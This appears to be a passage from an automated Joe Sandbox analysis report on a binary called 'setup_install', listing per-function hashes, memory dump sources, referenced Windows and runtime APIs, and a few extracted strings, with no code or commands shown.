                                        • Instruction ID: 0b6e0dffd9293ca98acec9f48a4a1a94bc15df0215d3dd4cd36eba00ff1b97a5
                                        • Opcode Fuzzy Hash: 408d583c8d6ab92758066e532e2d5cbb58883b4fa8d39abdb835644ed5189e22
                                        • Instruction Fuzzy Hash: 15216F70A042009FCB14FF79C5C569ABFE1AF05348F0085AEE9854B366D779D944CB96
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1074d728a702dd99ef3f4c8f50a5b67c749093a2e8047ff75630de9897c1d13
                                        • Instruction ID: f63344d4215dfd62ae23d7a37a87f984b8b9488a415ef99cd404c2738710182e
                                        • Opcode Fuzzy Hash: e1074d728a702dd99ef3f4c8f50a5b67c749093a2e8047ff75630de9897c1d13
                                        • Instruction Fuzzy Hash: 3111C2316042119BDB00BE19D98096FF7E9FBD9358F040E6FE884A7301E774E8128BDA
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: mallocstrerrorstrlen
                                        • String ID:
                                        • API String ID: 993191051-0
                                        • Opcode ID: ef7b87638a1bbbe68ef1f846eaed84aae83c0fde87b0597b4833e13b1acb7d85
                                        • Instruction ID: d661d0c154e99ca312f3a3f9383df3eb2f2185d1ef63dc9c4af59cc7c769369a
                                        • Opcode Fuzzy Hash: ef7b87638a1bbbe68ef1f846eaed84aae83c0fde87b0597b4833e13b1acb7d85
                                        • Instruction Fuzzy Hash: 8F11FBB08187149BCF107F6AC48546EBFF5AE52348F45C83EE4C96B212D77C94858BDA
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 84bf33c1fbf4d1563d14f52e51cd1051c2a068922ff74a5f6d9ce7b83a7a84ca
                                        • Instruction ID: 78fcb0fe7c5a5b47a3e0f62c41d166303783e6cd5baacf020f6a147cb23d0802
                                        • Opcode Fuzzy Hash: 84bf33c1fbf4d1563d14f52e51cd1051c2a068922ff74a5f6d9ce7b83a7a84ca
                                        • Instruction Fuzzy Hash: D10109B04586118BCF10BF66C48142EBEF2AE52348F419C7EE1C527252D77C9485CBDE
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a430a732bed3831dbee5720d36ab6ee648f6cc8d298d42221e3ddd0c6baaecd
                                        • Instruction ID: 70b345a367f61e2cc505c6828a18019723ab25148ff624561a56d965b51c77f6
                                        • Opcode Fuzzy Hash: 0a430a732bed3831dbee5720d36ab6ee648f6cc8d298d42221e3ddd0c6baaecd
                                        • Instruction Fuzzy Hash: EB01D3B08186018ACF10BF66C48142EBEF2AE52348F51987EE1856B212D77C98858B9E
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2bb8122c11225249702b1f1eeabfe051ab89a0e5e50b75ea1070e1f31c22bffa
                                        • Instruction ID: 667bbbd54f9e1fa958ba811afd346c4de76c95434dbddba3e9882f232aef63a0
                                        • Opcode Fuzzy Hash: 2bb8122c11225249702b1f1eeabfe051ab89a0e5e50b75ea1070e1f31c22bffa
                                        • Instruction Fuzzy Hash: 2E017CB0A082109FC704EF2DC18451AFBE5FBD9308F50C8AEE0889B315E7759945CB96
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9dc40bc6eefcd07be14acdec06e5cb669f690b85e8162c132b8c64cc987e486b
                                        • Instruction ID: 229ea5a61a7def4534e5701ce02f15af018db38cb8c2bf21966133556898d559
                                        • Opcode Fuzzy Hash: 9dc40bc6eefcd07be14acdec06e5cb669f690b85e8162c132b8c64cc987e486b
                                        • Instruction Fuzzy Hash: 8401D6B08186018BCF10BF65C48146EBFF2AE52348F51D83EE0C56B212D77C9485CB9E
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a18c13fa7a17e744e1208ae107e54cf8805762be5822f9d6c48ee89e66c2ab1
                                        • Instruction ID: 1463eb21d5cc478000218b3809f0d65f1a20f55fbc20d8c4add77a3c59f68165
                                        • Opcode Fuzzy Hash: 8a18c13fa7a17e744e1208ae107e54cf8805762be5822f9d6c48ee89e66c2ab1
                                        • Instruction Fuzzy Hash: 1EE0B6B1E056409FCB08EF18C685929F7F1AF96304F54D9ADE48897320D339D810CA1A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b079a1bb8fa09e07e509617cc661bb5cf5ff55f891d2776dc8f5c3a51af7ee4
                                        • Instruction ID: cde87672178cba446f3dde8e341ee331ea007e398fb0a2c05fedb9284a3ccdf8
                                        • Opcode Fuzzy Hash: 0b079a1bb8fa09e07e509617cc661bb5cf5ff55f891d2776dc8f5c3a51af7ee4
                                        • Instruction Fuzzy Hash: 53C012B0C042408ACA00BF39810A228BEB0AB42208F8469ACE48023242E639C518865F
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f3e76d79c3b50aa6c1c58171071c490aa7213fef6b9aca8b2243d5936cd3ab7
                                        • Instruction ID: 730ae712c55f80f654ae3bc3deab80b0155cf41914172e020d66579a569ac515
                                        • Opcode Fuzzy Hash: 2f3e76d79c3b50aa6c1c58171071c490aa7213fef6b9aca8b2243d5936cd3ab7
                                        • Instruction Fuzzy Hash: ECB012B1C666098382400D2875114F3B3B18A3BF00A10B9C7800173133D37BC10B004F
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d9153d6de71202e64c47e0eb9bc71349c9de334a5057db935277c86892b15074
                                        • Instruction ID: 28b4ce3d5383ec1f535cf617abd6c098e7e643cf13f6db443b046c6adf4e1ca8
                                        • Opcode Fuzzy Hash: d9153d6de71202e64c47e0eb9bc71349c9de334a5057db935277c86892b15074
                                        • Instruction Fuzzy Hash: 50B012A1C0A20583D2000D5078101B197719913F01A183586804273133E33EC606140F
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e71ac68c007217988f0885e775c589f3cb37abb6b508bb6c886cac10065d7757
                                        • Instruction ID: 299bbad16acdbf4396567a771af2aaf2618faeb3c8292ce8c9875370f5131e82
                                        • Opcode Fuzzy Hash: e71ac68c007217988f0885e775c589f3cb37abb6b508bb6c886cac10065d7757
                                        • Instruction Fuzzy Hash: C3B012E2E411008242018F105811030F4709933B05F6478C64C0173233F365C602018F
                                        APIs
                                        Strings
                                        • -, xrefs: 0041F181
                                        • not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 0041F009
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: fwrite$abortfputsfreememcpy$strlen
                                        • String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/):
                                        • API String ID: 4144276882-2342464244
                                        • Opcode ID: cd3a9be7ef8ea4c9239de57005ad195fa7dcb0d0ac8f198d42dcaa256c3f2816
                                        • Instruction ID: 5c5ad94a5d3def798546fb067e6cc0214174358a870f5ae2cfd2931dcdbd052b
                                        • Opcode Fuzzy Hash: cd3a9be7ef8ea4c9239de57005ad195fa7dcb0d0ac8f198d42dcaa256c3f2816
                                        • Instruction Fuzzy Hash: 9A5109B18083059FDB00AF75C58579ABFE5AF85304F01C92EE8D887292D7BD8485DF9A
                                        APIs
                                        • calloc.MSVCRT ref: 64941E3A
                                        • CreateSemaphoreA.KERNEL32 ref: 64941E8E
                                        • CreateSemaphoreA.KERNEL32 ref: 64941EB5
                                        • InitializeCriticalSection.KERNEL32 ref: 64941ED4
                                        • InitializeCriticalSection.KERNEL32 ref: 64941EDF
                                        • InitializeCriticalSection.KERNEL32 ref: 64941EEA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalInitializeSection$CreateSemaphore$calloc
                                        • String ID: l
                                        • API String ID: 2075313795-2517025534
                                        • Opcode ID: 9aaa6c5c67e2f7326f4fc67e51d35e98c8ba59dbcf383b97e32ef3a72aa22eeb
                                        • Instruction ID: 5f82bd9895e35abc0f185ee0a532f79bb5fb035c4e946804434c70138354a234
                                        • Opcode Fuzzy Hash: 9aaa6c5c67e2f7326f4fc67e51d35e98c8ba59dbcf383b97e32ef3a72aa22eeb
                                        • Instruction Fuzzy Hash: 8F3116B05483048FEB00BF69D58875ABFE8EF41314F118AACDC948B289E775D458CF92
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: EventSleepThread$CloseCreateHandlePriorityResetResume_beginthreadex
                                        • String ID:
                                        • API String ID: 3227561178-0
                                        • Opcode ID: 431ec93e6a579e39a7518719b31b1fb4d24b576a4f8ad2a951e1d947869cc00e
                                        • Instruction ID: b1f898f54aaf90a0b0c44c96a1744be5c7f7f43bda32287184fb95c958deeaf6
                                        • Opcode Fuzzy Hash: 431ec93e6a579e39a7518719b31b1fb4d24b576a4f8ad2a951e1d947869cc00e
                                        • Instruction Fuzzy Hash: B29125B0A487069FDB40DF69D18879ABBF4FF49314F105229E86897780D739E864CF92
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 030357454f855d747232583ca3a9bd5ffa90862dff2a82f640e8239cd4a28283
                                        • Instruction ID: d2d898d6f5bebeec6f6a978c03acc3a58f9fe4287f25cbabadd2a13ba0a14b99
                                        • Opcode Fuzzy Hash: 030357454f855d747232583ca3a9bd5ffa90862dff2a82f640e8239cd4a28283
                                        • Instruction Fuzzy Hash: E6A1B470908205CBD710DFA8D8C075ABBA1BB45328F15863FE858AB3D1D77DD849CB5A
                                        APIs
                                        • TryEnterCriticalSection.KERNEL32 ref: 649423A1
                                        • LeaveCriticalSection.KERNEL32 ref: 649423E6
                                          • Part of subcall function 649422A0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,-0000001E,-0000000A,00000016,?,64942587), ref: 649422DF
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Leave$Enter
                                        • String ID:
                                        • API String ID: 2978645861-0
                                        • Opcode ID: bb34480e6b18685c8f96a977b34393c6c3ff373fcaa6e2c71ea72db012cf590e
                                        • Instruction ID: 82b885df431c93ba722f6f34917179fd01ee2d29753087ea17606feb28e6b18b
                                        • Opcode Fuzzy Hash: bb34480e6b18685c8f96a977b34393c6c3ff373fcaa6e2c71ea72db012cf590e
                                        • Instruction Fuzzy Hash: FD4129B1A442048FDB00EF69D5846AEBBF9FF46350F014669DC94DB348E734E855CB92
                                        APIs
                                        • pthread_once.LIBWINPTHREAD-1 ref: 0049703F
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 0049704C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_mutex_lockpthread_once
                                        • String ID: `pJ
                                        • API String ID: 1659557605-245416778
                                        • Opcode ID: 74d1e0d4b4bf3a636026be5ed49e10f99bd7a064409446ef85fcf553e1bf2e41
                                        • Instruction ID: 5e928ddc6c9d9d5eb478e5a6af3faa379a1f734d2b4e894dab37f6c16b81864a
                                        • Opcode Fuzzy Hash: 74d1e0d4b4bf3a636026be5ed49e10f99bd7a064409446ef85fcf553e1bf2e41
                                        • Instruction Fuzzy Hash: EC910A706096008BDF107F7AC48A22EBEE1AF52348F05997EE5845B357CB7D9484C7AE
                                        APIs
